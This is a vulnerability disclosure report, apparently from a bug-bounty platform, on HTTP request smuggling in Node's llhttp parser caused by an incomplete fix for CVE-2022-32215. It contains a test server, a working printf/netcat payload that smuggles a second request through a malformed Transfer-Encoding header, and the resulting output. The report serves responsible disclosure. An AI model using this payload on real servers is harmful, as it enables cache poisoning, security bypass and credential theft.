HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding (improper fix for CVE-2022-32215)

**Summary:** Due to an incomplete fix for CVE-2022-32215, the `llhttp` parser in the `http` module in Node v16.16.0 and 18.7.0 still does not correctly handle multi-line Transfer-Encoding headers. This can lead to HTTP Request Smuggling (HRS). **Description:** [add more details about this vulnerability] We have identified that the root issue of CVE-2022-32215 (that was [reported here](https://hackerone.com/reports/1501679)) was seemingly not fixed at all. Running the same exploit produces the same unwanted result. For the sake of brevity, I won't repeat the description, it can be seen in the [original issue](https://hackerone.com/reports/1501679). ## Steps To Reproduce: The reproduction steps are the same from the original issue #### Testing Server Run the following server (`node server.js`): ```js const http = require('http'); http.createServer((request, response) => { let body = []; request.on('error', (err) => { response.end("error while reading body: " + err) }).on('data', (chunk) => { body.push(chunk); }).on('end', () => { body = Buffer.concat(body).toString(); response.on('error', (err) => { response.end("error while sending response: " + err) }); response.end(JSON.stringify({ "Headers": request.headers, "Length": body.length, "Body": body, }) + "\n"); }); }).listen(80); ``` #### Payload ``` printf "POST / HTTP/1.1\r\n"\ "Host: 127.0.0.1\r\n"\ "Transfer-Encoding: chunked\r\n"\ " , chunked-false\r\n"\ "\r\n"\ "1\r\n"\ "A\r\n"\ "0\r\n"\ "\r\n"\ "GET /flag HTTP/1.1\r\n"\ "Host: 127.0.0.1\r\n"\ "foo: x\r\n"\ "\r\n"\ "\r\n" | nc localhost 80 ``` #### Output ``` HTTP/1.1 200 OK Date: Sun, 06 Mar 2022 03:34:05 GMT Connection: keep-alive Keep-Alive: timeout=5 Content-Length: 101 {"Headers":{"transfer-encoding":"chunked , chunked-false"},"Length":1,"Body":"A"} HTTP/1.1 200 OK Date: Sun, 06 Mar 2022 03:34:05 GMT Connection: keep-alive Keep-Alive: timeout=5 Content-Length: 64 {"Headers":{"host":"127.0.0.1", "foo":"x"},"Length":0,"Body":""} ``` As you can see, the payload was parsed as two requests (POST to / , and GET to /flag) which is erroneous behavior (the first request was parsed as a chunked request, which is wrong) The expected output should be - ``` HTTP/1.1 400 Bad Request Connection: close ``` ## Supporting Material/References: Exploitation of the issue on Node 16.16.0 - {F1861233} ## Credit The vulnerability was discovered by Liav Gutman of the JFrog CSO Team ## Impact Depending on the specific web application, HRS can lead to cache poisoning, bypassing of security layers, stealing of credentials and so on.